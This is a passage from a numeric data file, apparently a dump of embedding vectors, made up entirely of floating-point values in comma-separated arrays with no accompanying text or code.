.058812264,0.0065361536,0.0042098016,-0.079395644,0.032961354,0.010348867,-0.045354504,-0.023564523,-0.02309011,-0.021822283,0.0056683025,0.019884847,0.046974216,-0.0447294,-0.01713685,-0.02315951,0.029893175,-0.008656187,0.04318385,-0.014855046,-0.014303964,0.03430459,-0.051804986,-0.02645797,-0.0321072,-0.016790906,0.0040542926,0.017082335,0.030014032,-0.02725496,-0.01664873,0.031023325,-0.015344158,0.03308096,-0.015570055,0.015586839,0.020598445,-0.017213693,0.017288221,-0.016992623,0.05904579,0.0060848137,-0.028321302,-0.0017963484,0.027926993,0.0062205074,0.0541628,-0.05122986,-0.0072319843,0.009295686,0.014521103,-0.013227356,0.014958597,0.0877164,-0.050423075,-0.003052418,-0.011415015,0.013042781,-0.016912227,0.06639731,0.01737317,-0.013219597,-0.0040620025,0.01561582,0.0007002532,0.013643811,-0.036715362,0.0028571903,-0.023984231,-0.041788217,0.011320923,-0.03203246,-0.07118472,0.04204297,-0.008951241,-0.0016832335,-0.06486169,-0.062021557,-0.016621547,-0.051705867,-0.00047240802,-0.018769065,0.03756278,0.009686149,0.031302746,-0.050229993,0.052461553,0.05892034,0.00809456,0.028558787,0.03140584,0.009476264,-0.0016301794,0.024307566,0.0054711797,-0.04350011,-0.0015419438,0.0056309495,-0.025354175,0.013496618,-0.028002193,0.00017924793,0.0029503847,-0.011788626,-0.016862236,-0.02089767,-0.019100433,-0.021711083,-0.050734486,0.032768313,0.0027038695,-0.020135414,0.020578606,-0.01099674,0.06352673,-0.030485183,0.06679448,0.0059043705,0.07910435,-0.0014015004,-0.020956488,-0.017584007,-0.02372868,0.0231519,-0.044046756,0.009393434,0.038909018,-0.0018626229,-0.008492001,0.035038285,0.027844466,0.040701106,-0.027250098,-0.011195229,-0.028332971,0.02869071,-0.010233473,0.023097964,0.0064888266,0.030699259,-0.02290137,-0.007414664,-0.026110247,-0.038171314,0.017899422,0.008629791,0.01801958,0.060926266,0.018590821,0.032803036,0.053324588,0.00017380422,0.035546623,-0.005576908,-0.043654513,-0.03187823,0.020175261,-0.018927576,-0.02841912,-0.025731286,0.028470293,-0.028993493,0.018063407,-0.014207714,-0.026522232,0.01888117,0.025537662,-0.0017463657,-0.005065993,-0.03450927,0.06383041,0.008389811,0.011548649,0.06896612,0.0126044415,-0.00994405,-0.052333042,0.027621727,0.027552089,0.049870584,0.05645667,-0.0059862016,0.008671003,-0.0003577515,-0.019097999,-0.0181532,-0.020043174,-0.05829769,-0.035034403,-0.026656484,0.026579615,-0.03243087,0.01776385,0.056450266,-0.026321432,0.030026803,0.026838157,0.0072479476,-0.04831115,-0.0049919086,-0.06256881,-0.028628783,0.07113833,-0.024487952,0.03319179,-0.0027251353,0.008440331,0.021112146,0.0251272,-0.0018123123,-0.051707737,-0.033294328,0.05384725,-0.012557548,0.007320766,0.014239311,0.0473624,0.06140827,0.030809501,0.028723503,-0.053872276,0.022680735,0.04159505,-0.03831403,-0.013528138,0.032316793,0.012952696,-0.0032762112,0.023892337,-0.021362957,-0.04217345,0.027632792,0.021671576,0.0338848,0.012351705,0.022120204,-0.041951686,0.043717694,-0.02277538,0.0053006527,0.044451524,-0.034274556,-0.017885208,0.037342537,0.0014796392,0.009160459,0.0073872833,0.016906058,-0.020658195,-0.021954969,-0.0011807125,-0.03460305,0.01055619,-0.066888765,0.00252512,-0.0041112974,0.0026290312,0.033634946,-0.008674384,-0.00700318,-0.012120292,0.0380709,-0.044811465,0.046967197,-0.022909822,0.02944087,0.017116262,-0.063026294,-0.031474955,-0.03750734,-0.022062544,0.014433674,-0.0046471744,0.015528856,0.013675965,0.012995064,0.0545413,-0.044315226,-0.06297075,0.03825211,0.036416784,-0.013991543,0.023873676,0.0032497714,-0.019208886,0.058968313,-0.024670431,0.048055537,0.02681533,-0.03533962,-0.04957228,0.011441618,-0.0010889594,0.0562448,0.00018210808,0.012386321,-0.014820601,0.011804258,0.073624596,0.040775016,0.019485397,-0.0017293053,0.033982098,0.008460268,0.03807719,0.0127421925,-0.053551037,0.060083307,0.035694316,0.023067078,-0.024424497,-0.018005896,-0.006638816,0.004319203,0.056059465,-0.050615653,0.0531212,-0.008943697,-0.05771016,-0.037150033,-0.041729648,-0.018212209,0.07355129,0.030005042,-0.057818666,-0.08743426,0.067393266,0.021011697,0.019253526,0.023270924,-0.009575639,0.11938836,-0.021307278,-0.017646985,-0.013217781,0.0070988038,-0.0128780035,-0.0021897727,0.02528138,-0.080500506,-0.0021286407,0.009713094,-0.03099703,-0.031454798,-0.049966827,0.037474703,0.101030685,-0.05803007,-0.028717326,-0.0047440594,-0.05880713,0.021651177,0.036821116,-0.03107843,-0.0045134504,0.009742675,0.05098508,0.02249394,-0.04351273,-0.017997663,-0.043989547,-0.013127667,0.022177938,0.014724794,-0.01782734,-0.031105356,-0.0036774771,0.04362004,0.024141854,0.04027483,-0.017538678,-0.0054508387,-0.041656874,-0.016371172,0.02671165,-0.023738667,0.008169348,0.034522604,0.030724498,-0.01959753,0.023418197,0.023371244,-0.03130623,0.058289565,-0.061169337,-0.027750595,0.0014166889,-0.019344741,-0.005889132,-0.00934241,0.010246676,0.030050224,-0.047991946,0.079330884,0.012054143,-0.05054387,-0.030746598,-0.012122378,-0.049434274,-0.022284428,0.02414852,-0.03348166,0.0059199827,0.01030928,-0.040181223,0.03996818,-0.008339567,0.018533273,0.028722957,-0.04842149,-0.014064688,0.0011530231,-0.0076316516,-0.034003068,0.017264614,0.014079222,0.027900161,-0.011345383,0.044314567,0.022905622,0.0010659784,0.009171946,-0.04909734,-0.024956228,0.04675327,-0.013659677,-0.09326969,0.056151535,-0.073193334,0.023300322,-0.057708926,0.01734191,-0.0321669,0.044837598,-0.021579053,-0.02084967,-0.07344576,-0.02472786,-0.010487825,0.05894475,0.014984083,0.039828006,-0.019830374,0.026602868,0.011320208,-0.0032814492,0.017663458,-0.011560134,-0.05345917,-0.0027094781,-0.029395936,0.011173666,0.028386975,0.022595776,-0.002336676,-0.08234514,-0.057354454,0.03843142,0.0058664144,0.039007615,0.0032768354,-0.051452715,0.012881487,-0.084042594,-0.045274787,0.03525417,-0.043225713,-0.028048016,0.060695887,0.014760753,-0.036830615,-0.011703411,0.043841243,-0.0044288747,0.012574533,-0.028704135,-0.05950931,0.016741963,-0.00355784,0.06730391,-0.047546834,0.03391772,0.10102206,-0.016805973,-0.0013770688,-0.016948076,-0.03437282,0.040531762,-0.016778199,-0.028862953,-0.018878326,-0.0018527445,-0.058994915,0.03727533,-0.01195152,0.012186242,-0.04545349,-0.007929717,-0.048946794,0.042639825,-0.031590875,0.031469736,-0.012061847,0.008574733,-0.04175883,0.030591223,0.00014844224,-0.0659814,0.01100942,-0.025986593,-0.0122901555,-0.08052758,0.017995363,-0.031832077,0.03465066,-0.018732412,0.0663483,0.020459881,-0.023812512,0.01692401,0.03810186,0.032818418,-0.033856392,0.011418383,0.06113906,0.06443592,-0.037441928,0.057429872,0.12298004,0.010457129,-0.015092671,0.0009401962,-0.015521038,0.017140612,-0.031140529,-0.05083626,-0.046791535,-0.015784174,-0.0069442163,0.03499713,-0.027111327,0.0013090556,0.017073384,-0.030631132,-0.0033521436,-0.02992796,-0.04384504,0.010415783,0.040019028,0.005066144,-0.02040337,0.028702354,0.018626276,0.06729728,0.030799417,-0.027257279,-0.023125712,-0.0068264045,-0.022926487,0.036117848,-0.06920525,0.008148553,-0.03904149,-0.0005333231,-0.010068601,-0.01846257,-0.032901764,-0.03111899,-0.056588724,0.015354127,-0.003510302,0.037008163,0.0540304,0.011932642,-0.044385105,-0.050471365,0.048156925,-0.009058658,-0.008636956,0.029422417,0.047826394,0.00010254073,-0.009018912,0.041118234,-0.0026698816,-0.005239929,-0.056682497,-0.041923895,-0.014377898,-0.023978109,0.033315808,0.01095807,0.020825833,-0.02629937,-0.03022119,0.013575692,0.011460516,0.020838713,-0.007025003,-0.06276118,-0.0057218894,0.0022299434,-0.019394556,0.03266763,-0.018031586,0.0153393205,0.007695868,-0.0017489645,-0.007450041,-0.024832893,0.09258986,-0.014761811,0.0088528525,-0.014540602,-0.035975236,-0.09392566,-0.017666962,0.003953962,0.038691204,-0.028983854,-0.01963091,-0.02547092,-0.018252954,-0.039134577,0.030409113,-0.00081488665,-0.062091935,0.0050094263,-0.013167877,0.011307404,0.0010789013,-0.0073561217,0.026764523,0.009421146,0.032710776,0.087186605,0.024499858,0.06140633,-0.022779787,0.0232781,0.020044379,-0.018160012,-0.0012738162,-0.0064871344,-0.016837575],[0.062596805,0.03589894,-0.15155007,-0.039609343,0.07769135,-0.051339522,0.008238447,0.012412169,-0.022839263,-0.048179127,-0.03148535,0.01901743,0.016658891,0.0016367722,-0.004468831,0.027937463,0.031416148,-0.061683606,-0.040972967,0.027330484,-0.03154477,0.009580584,-0.021114334,-0.053655833,0.09146021,0.053260382,0.0004957704,-0.026884668,-0.0024824378,0.025764702,0.0878702,-0.026666274,-0.0096982205,-0.032192323,-0.023252822,-0.06503458,-0.018630628,0.013362444,0.027933855,-0.021690866,-0.013596663,0.087422416,0.0048558703,-0.0005241407,0.091255054,0.020228073,0.02134419,-0.048486184,0.061322905,-0.053909242,0.012577486,-0.041163437,0.0076019764,-0.016042892,0.064623356,0.037326735,-0.0029320186,0.04322248,-0.03257857,-0.021143584,0.08603679,0.087022,-0.08771697,0.08177703,0.025658187,-0.0058060037,-0.028023196,0.050274957,-0.00453813,-0.02915131,0.028835863,-0.00578247,-0.016930722,0.0019455891,-0.047631327,-0.008633174,0.030511672,0.009775599,0.014789382,0.041729562,0.021531746,-0.0062417006,0.040060427,-0.015168924,0.057046134,-0.016191639,-0.011935335,-0.020693628,-0.01896193,0.08970837,-0.015690243,-0.028199786,-0.029679064,0.03524573,-0.03531774,0.021397572,0.023856957,0.041457996,-0.033895023,-0.027754907,-0.008397453,-0.053707413,0.04377325,-0.004926092,0.02287917,-0.002297058,0.0014776681,0.037619762,0.0013727171,0.02878546,0.027541889,0.028671835,-0.010509826,-0.017804367,-0.009369704,-0.021782016,0.049784128,-0.0044407486,0.021121642,0.05375431,-0.05119409,-0.06465345,-0.0069340817,0.06656196,0.020984756,0.014752938,-0.041757036,0.026623566,-0.011549735,-0.038042523,-0.06442886,-0.012725028,-0.04046711,-0.020869603,0.0020379939,0.042722836,-0.054954097,0.0050995834,-0.0049510156,-0.0215926,-0.019563401,0.03509824,-0.021324307,-0.040412955,-0.021767296,-0.06743996,0.014587429,0.019478308,-0.023012046,0.011446863,-0.0015835398,0.043483995,-0.049806852,0.036176782,0.014511912,-0.015182301,0.016890295,0.0117799435,0.044342123,0.050768785,0.046287864,0.046488345,-0.040161565,0.040126093,-0.0039665103,-0.0816121,-0.0024518433,0.051698327,-0.016998993,0.024509782,-0.07532225,-0.0048431517,0.023938373,-0.012414847,0.0032871012,-0.034706235,0.011632069,-0.031459972,0.0440679,-0.023395399,0.009082541,-0.067466736,0.040629704,0.049311846,-0.05893744,0.006227746,0.002902961,0.008426257,-0.008082833,-0.025644293,-0.009943118,-0.014758424,-0.009649682,-0.004562803,-0.046083625,-0.04344425,0.048325103,0.0039800974,0.0722363,-0.014114414,-0.041885216,0.0076573333,-0.040735766,-0.009053623,-0.017507486,0.048437536,0.0016667213,-0.007020391,0.007065164,0.025421647,0.09771975,0.020178534,-0.031063447,0.008090424,0.05072241,-0.03947364,-0.0030555676,-0.016825113,-0.030787248,0.028879447,0.039759316,-0.012301657,0.035878137,-0.012153281,-0.012472207,-0.014738815,-0.02840392,0.008947252,-0.023688294,-0.005236958,-0.040319894,-0.08324929,0.049018726,0.021174345,-0.0037608794,0.050533075,-0.0017074025,0.061660517,0.03558594,-0.0024181472,0.03849887,0.070739485,-0.0073285676,0.013743349,-0.03124972,0.0070028603,0.011114637,-0.051673014,0.020073695,0.01700266,-0.0046629664,-0.039672025,0.002480579,0.030253356,0.025736798,-0.031139009,0.012920474,-0.052939545,-0.0027933102,0.011021431,0.04991835,-0.029464526,-0.0005781394,-0.0510515,-0.021644047,-0.0091872625,-0.038427435,0.005202745,0.036338158,0.019324072,-0.0035495919,0.024344716,0.012758766,0.045257077,0.011046887,-0.020378787,0.011307957,-0.081255674,-0.017358476,0.06220984,-0.057441235,-0.0056104087,-0.033721793,0.016178196,-0.025020832,0.029141853,-0.015930543,0.0068399655,0.011271555,-0.027724274,0.002185983,-0.0014241169,0.01882638,0.045729786,-0.029702522,0.045524456,0.026884994,0.009881913,0.028669337,-0.0496568,0.030831436,0.09212476,0.015511442,0.03353653,-0.028347928,-0.0005373235,0.023806201,-0.0023988907,-0.0044562514,-0.025933243,-0.008488204,-0.004030564,-0.027409699,0.018677149,-0.09317672,0.028500846,0.005058242,0.0030507576,0.016034383,-0.052172676,-0.027219458,-0.05128129,-0.0011226647,-0.04953995,-0.028967025,0.012739235,-0.006152046,0.046011236,0.006915387,-0.012648919,0.020705959,0.06902875,0.029685896,-0.017199704,-0.030760717,0.017611738,-0.008354923,0.0026153016,0.0034356415,-0.0043042265,0.0066633904,-0.05583423,0.05717902,-0.03388088,-0.012932337,0.026566291,-0.014660136,-0.04875938,0.11281652,0.024839118,0.0036053858,0.006783942,-0.054522168,-0.015159479,0.018754749,-0.00953547,-0.011727157,0.025394961,0.019289957,-0.015778724,0.033179402,-0.0018566297,0.024023436,-0.040769324,-0.011883832,0.02015206,0.0371979,-0.0033325374,0.0010136875,-0.030328833,-0.04063757,-0.040587205,-0.012830691,0.015915785,0.0005839152,0.01870134,-0.082043275,-0.012811556,-0.02213403,-0.012723781,0.027344078,-0.039596334,-0.013895376,0.019234033,0.014083548,-0.030115506,0.008955349,0.010665122,0.042597532,0.042122714,-0.016369564,-0.020645477,-0.012423883,0.018913662,0.03535798,-0.041977223,-0.022451095,-0.004396137,0.036934562,-0.020271806,-0.09518399,-0.028948393,0.008310184,-0.04093787,-0.023439988,0.00034476828,-0.0076421765,-0.018997442,0.06399437,-0.030828616,0.021154985,0.002952332,-0.00076160976,-0.0057658227,0.03355162,-0.0038955216,0.045387853,0.027977126,0.017169941,-0.044922046,0.03477125,0.011456681,-0.021708969,0.0110399,0.0128043005,0.00831878,0.021303328,0.049883362,0.024950592,-0.012014782,0.03742722,0.05479442,0.020716019,0.013563933,0.015425928,-0.015371174,0.019087138,0.034825508,-0.04188561,0.051165424,0.008826196,-0.019537602,-0.02959513,0.0009121719,0.0068030246,0.09710953,0.053614326,-0.0143053075,-0.023946902,0.060265545,0.02270827,0.046564437,0.026881626,0.023456056,0.098295644,0.026366606,-0.05690749,-0.020272287,0.035591748,0.014617081,0.022314409,0.012889358,-0.023200583,0.009683415,0.000084873885,-0.008682009,-0.015945375,-0.05246651,0.024323888,0.07582233,-0.022569036,-0.001404699,0.0007816422,-0.036229357,0.04598379,-0.002857576,-0.03358182,0.006083695,0.009211623,0.083998084,-0.040853128,0.0012986319,-0.03320677,-0.019381527,-0.0335313,0.04098242,0.026357513,-0.011731549,-0.023032252,-0.022336772,0.05011396,0.03755733,0.03776854,-0.01642474,-0.002691469,-0.0391173,-0.0635985,0.07209908,0.013263329,0.0010876744,0.026373886,0.01947805,0.0032683108,0.0020129045,0.011869842,0.018499529,0.079332545,-0.036003184,-0.09748844,-0.04406566,0.0030231627,-0.008073009,0.0040968554,0.013464664,0.057201415,-0.055459607,0.022357611,-0.013115697,-0.07296511,0.017870666,-0.008063375,-0.020161428,-0.030090066,-0.001693197,-0.08511173,0.016537504,0.030705212,-0.07005602,0.032691084,0.02678312,0.044526294,-0.0025066363,-0.07690862,-0.026823057,0.01652168,-0.04852907,-0.015755288,-0.015306063,0.029605718,0.023694936,0.041054152,0.047433402,0.01387077,0.0872382,-0.00031905633,0.010720851,-0.024764588,0.018012786,-0.012188355,-0.0762695,0.01914795,-0.030549634,-0.019184021,-0.031088723,0.07000513,0.015295995,-0.022578582,-0.016800478,-0.049396977,-0.028731322,-0.030168617,0.03161721,0.014988658,-0.016287394,-0.016209139,-0.0043739737,0.048146993,-0.03586712,0.0006554347,0.006551151,-0.008587378,-0.027407078,-0.01801737,-0.008656298,0.014596892,-0.0036003857,0.0014668633,-0.017639885,-0.03259059,-0.06372617,0.04815034,-0.0699077,0.021817941,-0.020461597,-0.04440847,-0.044850867,0.004215813,-0.048680462,0.014196586,-0.032861665,-0.010719129,0.03710118,0.02812092,-0.00024242894,-0.0067977505,0.0052704443,-0.052224364,-0.049589276,-0.030093202,-0.053424697,0.0010646781,0.056440037,0.04384922,-0.035015598,-0.023462793,0.054778367,-0.02750297,0.056663424,-0.01856392,0.00043832127,0.03586602,0.01093909,0.010409498,0.00985505,-0.011027548,-0.041239407,0.04174961,0.003814201,-0.020869471,-0.042408213,-0.030279143,-0.04782477,0.046693254,0.02334816,0.044050198,0.033301044,-0.02729195,0.021371653,0.009430764,0.019489286,-0.007165978,0.008367319,-0.045272678,-0.04635482,-0.02191701,0.02764921,-0.001331075,-0.002253081,-0.016747767,0.037308607,0.008643011,-0.012883252,0.028269883,0.04074419,0.01603791,-0.03520371,0.021273278,0.03374053,0.07480131,-0.044367008,0.07746975,0.06847215,0.008902409,0.00328168,0.025850171,-0.040306255,0.036279425,-0.061243147,-0.06512036,-0.03913533,-0.006933774,-0.036703505,0.024028992,-0.066346064,0.03983072,0.047809955,-0.0029921671,-0.0181541,-0.031612385,-0.009875593,0.033600003,0.032915935,0.015887223,-0.029740868,-0.030081479,0.04503261,0.047302585,0.04062075,0.0009152568,-0.025906729,-0.016105644,-0.047145907,0.020365417,-0.011891109,0.04804162,-0.01692556,0.054397155,-0.002630653,-0.051079936,-0.107896864,-0.02680688,-0.057493716,-0.008133497,-0.04934907,0.010597479,0.0076845502,-0.018362898,-0.00006588856,-0.02185521,0.05013003,-0.053645566,0.00010646748,0.053715013,0.076596975,0.004493478,-0.00088816823,0.009934517,0.002540052,-0.032332234,-0.047773033,-0.031743426,0.0009905685,0.021195365,0.0005994959,0.060390584,-0.005807609,-0.015090186,-0.056302827,-0.016424881,0.025370514,0.05231231,-0.028494842,-0.053700678,0.004546413,-0.01837175,-0.018638486,0.036932193,-0.05798036,-0.010389804,-0.018736785,-0.0029287469,-0.02683071,-0.024820592,0.03893522,-0.005631946,0.042968087,-0.04963029,-0.0041776956,-0.09479386,-0.033906523,-0.024094589,0.041708626,-0.03778864,0.018694641,0.009880352,-0.008317862,-0.004717559,0.042907584,0.069298625,-0.046309493,0.04432413,-0.0133677125,-0.05212218,0.010466371,0.0024601908,-0.0041177464,0.028776499,0.0220507,0.07115631,0.053810734,0.036286503,-0.032246508,0.007657413,0.019193554,-0.009656977,-0.055459853,-0.031580586,-0.025998611],[0.025110837,0.023963494,-0.152905,-0.03631372,0.07327958,-0.09338268,-0.018753039,-0.008926699,0.03514331,-0.035642248,-0.029618125,0.062259063,0.017116785,0.017200544,0.0070676827,-0.018134547,-0.013343891,-0.019922083,-0.01444881,-0.04392751,0.017402202,-0.040455073,0.0036686347,-0.056234967,0.05814898,0.038320024,0.005027524,-0.008093284,-0.020778107,0.025032599,0.084532134,-0.030035745,-0.05136371,-0.03132982,-0.093267344,-0.09958253,0.056821324,-0.0075429366,-0.02132112,0.06791411,0.029844694,-0.02170432,-0.022643458,-0.07982342,-0.018775037,0.045378685,0.04292185,0.0118988035,0.035300635,-0.08698804,-0.0053218813,-0.028363198,0.054848745,-0.025836214,0.07024403,-0.0059376685,0.037795354,0.015378889,-0.01643523,-0.04748979,0.06437192,-0.017518133,-0.039574817,0.08033527,0.021590117,0.0025382913,-0.056418642,0.03338077,0.05852056,0.015345628,0.004994051,-0.03428602,-0.0006875094,-0.00440792,0.014232319,-0.014238082,-0.016149268,-0.038062334,-0.026976477,0.08774802,0.014320066,-0.018357025,0.044885643,-0.0030387165,0.03119007,0.007614785,0.017041896,0.0035744605,-0.008932148,0.051066153,0.030934345,0.037111357,0.015185167,0.048965957,-0.032806054,0.022161428,0.010735469,0.047295865,-0.02871355,-0.054567803,-0.012405707,0.027552288,0.033257492,-0.044084128,0.017150728,0.023782162,0.016261451,-0.0050037163,0.052510954,-0.019349303,0.005086709,0.012324095,0.030883536,0.01670592,-0.0007615128,-0.055181604,0.04375396,0.02355826,0.04367015,0.09473789,0.008898712,-0.011313988,-0.057532735,0.0546013,0.014791542,0.010893417,-0.056780256,0.0608186,0.028540282,-0.063439935,0.025956457,0.027319068,-0.042453974,0.054980043,0.028122606,0.04094872,-0.048628222,-0.046859294,0.0018404309,-0.04299867,0.009849278,-0.00091276405,0.025409212,-0.027494183,-0.02215928,-0.022655727,0.017350709,-0.044209395,-0.047415692,0.046314687,-0.030850468,0.042876758,0.007286544,-0.02251947,0.04074414,-0.039512523,0.02949215,-0.008174453,0.020459866,0.061496187,0.017143313,-0.035832975,-0.063772224,0.04870526,-0.030036708,-0.059964336,0.014117393,0.08389492,0.03337161,0.010834999,-0.046903472,-0.009595063,-0.019408554,-0.020964343,0.018075021,0.06111607,0.027328534,-0.033242628,0.013285831,-0.022685645,0.007763463,-0.010241428,0.07472356,0.03154362,-0.03660606,0.009090581,-0.02124039,-0.0014071015,0.0040635825,-0.03359654,-0.00025766258,0.008960535,-0.0760164,-0.017039394,0.012612887,-0.036978167,0.039158273,-0.013746939,0.029998219,-0.023620766,-0.057838414,-0.026738156,-0.018089019,-0.027115148,-0.04386247,0.0210524,0.013792366,0.045621682,-0.013798664,0.039296817,0.03275122,-0.034319717,-0.027829478,-0.04572931,0.014340309,-0.029015576,0.022143329,-0.021443522,-0.025235785,-0.004938295,0.036803808,-0.0030938848,0.045190286,-0.0042697424,0.020310936,0.0144067835,-0.00068438903,0.0048130867,0.022993218,-0.00068013126,-0.051728826,-0.07300859,0.035423994,0.036042914,-0.0051299343,-0.013229162,0.0046719536,0.09780792,-0.0020191593,0.0063735144,0.0060670325,0.026684029,-0.011503186,0.038759958,-0.05206765,0.006097688,-0.04958033,-0.017664889,-0.0031130144,0.03927248,0.03365362,-0.0008436331,0.0077339564,0.0115239965,0.089783415,-0.037320957,-0.014175203,0.02340767,0.001563085,-0.0075640925,0.024328936,-0.01814315,0.016722983,-0.048539203,0.03355573,-0.061171517,-0.00965723,0.024242233,0.035813227,0.024126368,0.032720495,0.048841454,0.07730587,0.016923077,0.0052437945,0.024217676,0.060817756,-0.01028003,-0.0075097373,0.013916288,-0.09938506,0.020849038,-0.008294859,-0.030642074,0.010762378,-0.006949856,0.021609657,-0.033012178,-0.015049692,-0.001154118,0.04432118,-0.06905163,-0.015182029,0.009631862,-0.032375526,-0.028247826,0.03162153,-0.011947321,0.056448605,0.012494553,0.022832641,0.05427877,0.027563555,0.03156475,0.009521814,-0.003129069,-0.005195892,-0.0052640783,0.0064228233,-0.010274376,-0.07639176,0.032570705,0.015956046,0.043658964,-0.043065786,0.041673135,0.059270397,0.051945895,0.046583913,0.024554553,-0.015301729,-0.01851014,-0.00050168985,-0.020711284,0.00405432,0.014499169,0.0006366364,0.054366373,-0.055699423,-0.025731051,0.044954635,-0.00082770566,0.041776836,-0.025505483,-0.045471568,0.038720276,0.029096773,0.017786931,-0.027814148,0.006600828,0.034478575,-0.034891766,0.014810141,-0.07445768,0.036160514,0.05466019,-0.016407633,-0.030227771,0.009547773,0.03948441,-0.015945211,0.007940155,-0.0043306123,-0.00023062403,0.024525724,-0.039237898,0.03850491,-0.021847831,0.0070462776,0.0057599163,0.044031683,0.007354103,0.019321986,0.005753509,-0.033833403,0.02959995,0.044703994,0.021067483,0.020002646,0.011776099,-0.017696638,-0.03231668,0.016372798,0.038232762,-0.05517456,0.050141573,-0.048168663,-0.02551028,-0.0035846825,0.040494274,0.010444878,-0.09274423,0.0111917015,0.028310802,0.027486928,0.017914062,-0.0033756748,-0.017797537,0.026068024,0.003516419,0.012880285,-0.04669894,-0.019586932,0.01350526,0.013880663,-0.0072250618,0.018988555,0.019995866,-0.013043573,0.012667587,-0.045377906,-0.023519572,0.004257577,-0.0037409181,0.0011359588,0.0045975447,-0.06796203,-0.012902391,0.05851345,0.0027805879,0.022233266,-0.01072511,0.021461993,-0.022790035,0.024137596,0.02163785,0.059822887,0.018196758,-0.045367848,0.009032623,-0.027329423,-0.006877307,0.0034551616,0.002614248,-0.04581269,0.04066706,0.013656456,0.11471477,0.0022694971,-0.03641365,-0.008186261,0.04281129,0.06023329,-0.008333842,-0.016309919,-0.024318593,0.0019647414,0.039066784,0.034716263,-0.006396365,0.01636389,-0.00534531,-0.045431297,-0.042640086,0.0124216,0.08158673,0.07105287,-0.028893806,-0.038059294,0.051838383,-0.041375168,0.0019595874,-0.009731434,0.015352853,0.09721727,-0.011781644,0.0091876695,-0.008004377,0.040915612,0.011841588,0.0099509405,0.07606745,-0.087708674,0.02083898,0.006781536,0.059524823,-0.0056984164,-0.029526027,0.0472162,0.07073971,-0.058382772,-0.045086525,0.047381334,-0.0065161316,0.01644765,0.027175145,0.007739371,-0.00030783005,-0.06493002,0.026818817,-0.016463233,-0.03056383,-0.026347162,-0.06152919,-0.03008597,0.028669918,-0.0110833775,-0.003932734,0.03665737,-0.002366378,0.0058679846,-0.008685561,0.0005600327,0.031012548,-0.0032937652,-0.047412317,-0.025089819,0.04017229,-0.008763274,-0.03804026,0.04540785,0.06321341,-0.02749943,-0.018161822,0.036426906,-0.010230346,-0.013424088,-0.02414528,-0.05807186,0.00793515,0.042956192,-0.031626895,0.03246558,0.0010724101,0.0458931,-0.06454762,0.026082415,-0.034503005,-0.08412187,-0.0015650018,0.03691426,-0.009572807,-0.018902399,-0.03829609,-0.00020822354,0.016828658,-0.021110177,-0.02156873,0.032650106,-0.05635863,0.0030474141,-0.015504098,-0.06567548,-0.01872693,0.021815017,-0.02728667,0.008780037,0.012128046,0.028951341,0.025067324,0.0075078504,-0.0045008473,0.033287153,-0.007600333,-0.027739035,-0.022994243,0.02362474,0.035729602,-0.02803073,-0.04421812,0.028448857,-0.08401445,0.0039995173,-0.017715288,-0.005356991,-0.018123465,0.015378999,-0.011344391,-0.018116282,-0.038291864,-0.049959026,-0.0033125717,0.04491586,0.018037017,-0.034574714,-0.035544913,-0.034915872,0.012371033,0.016366472,0.055484693,-0.03164386,-0.05291983,-0.017652106,0.021752512,-0.013910683,0.012453866,0.03319161,0.0006140153,-0.0587536,-0.04643955,-0.014812116,-0.062721014,0.01706344,0.0111291995,-0.03318741,0.060031217,-0.05714725,-0.0441759,0.030468967,0.0030097107,-0.029907623,-0.013155884,0.006246338,-0.012845721,0.017554998,0.018998504,-0.0034975556,-0.01415449,-0.02639369,-0.03917959,-0.004419122,0.011545384,0.043778107,-0.003458109,-0.03162422,0.03902308,-0.002595225,0.03153739,-0.042940687,-0.029689671,0.03507136,0.004873461,0.0147785675,-0.012011979,0.030723006,-0.06257081,0.032513443,-0.014408803,-0.04730706,-0.005432778,-0.028017445,-0.032987267,0.058469035,-0.029708846,0.022717167,-0.026747728,0.00983326,-0.051952858,0.007089348,0.0186358,-0.061176416,0.012852148,-0.047902018,-0.05482025,-0.08013768,0.027048545,-0.024294965,0.044839945,0.022930376,0.034147084,0.05651485,-0.02641077,-0.031240536,-0.039950673,0.037347324,-0.008842996,-0.005252526,0.04311597,0.03400051,0.040840913,0.08458003,0.046584774,0.0016877274,-0.034372464,0.014579083,0.017341608,0.022562187,-0.0166327,-0.027743055,-0.034968812,-0.017659301,-0.009990326,-0.0031374705,-0.03967247,0.0502405,-0.022488758,-0.006717126,0.0022338326,-0.06654344,-0.07161294,-0.003543444,0.014484944,-0.019921003,-0.011376953,0.0297766,-0.012384584,0.092247285,0.007297648,-0.0016071001,-0.0030484963,0.025282457,-0.041657377,0.062731154,-0.02761837,0.025488134,-0.078761645,0.013114121,0.009806423,-0.056154385,-0.023342714,-0.008324327,-0.023043867,0.03763129,-0.037005037,-0.02047763,0.049036775,-0.019975558,-0.04545385,-0.04641233,0.029159063,-0.02030333,0.01288782,-0.01782543,0.025081387,-0.005487543,-0.027561141,0.019974066,-0.014265024,0.008624079,-0.027289798,-0.040425207,-0.006954564,0.023035953,0.07891768,-0.027391471,0.005388038,0.015095664,-0.037883516,0.0038992504,0.03931049,0.038039032,0.009325956,-0.021469215,0.02404674,-0.04083746,-0.030670876,0.023454156,0.011577478,0.06435969,-0.02813942,0.005278812,-0.038286652,-0.046669766,0.007108199,0.01142667,-0.02397436,-0.068385825,-0.021055492,-0.027682606,-0.06006507,-0.015309039,0.0066600833,-0.01810305,-0.0045167613,-0.004239699,0.028758818,-0.027329499,0.0755339,0.018638048,-0.074557506,0.062183827,-0.018681852,-0.02305889,0.039634727,-0.030491192,0.015706712,0.034849193,0.026523575,0.094436176,0.01091286,0.029446488,-0.054148268,-0.010080667,-0.0070620505,-0.053182926,-0.021998823,-0.0340426,-0.030342959],[0.057824995,0.046062306,-0.16584414,-0.060748618,0.058480013,-0.05989414,-0.004811841,0.03595415,-0.016815426,-0.046406332,0.0011090122,0.05669459,0.0643975,-0.001575474,0.029718362,-0.036238402,0.04754969,-0.036475185,0.023304982,0.009197059,0.026731322,-0.06110668,-0.008687241,-0.04022086,0.07423585,0.045954164,0.0071325856,-0.010537186,-0.038901728,0.027158309,0.043209944,-0.07890135,-0.05464794,-0.043013055,-0.084855475,-0.07972399,0.0003922913,-0.048181348,-0.06609457,0.047328502,0.074615665,-0.032475963,-0.0020569302,-0.051797677,0.034513474,0.046651836,0.024306951,0.0014956516,0.026419919,-0.091586106,0.02291372,-0.039241005,0.035221327,-0.012583472,0.03409557,0.021374224,-0.043613736,-0.007731318,-0.018644467,-0.021168264,0.07992258,-0.012619731,-0.029636314,0.053970035,0.038355462,0.018256258,-0.02379461,0.07489676,-0.001989232,0.020026265,0.0034758889,-0.0100179305,-0.0047044056,0.005986639,-0.004291376,-0.02663359,-0.06438626,-0.025831668,-0.039326202,0.07032708,0.050331753,-0.0075192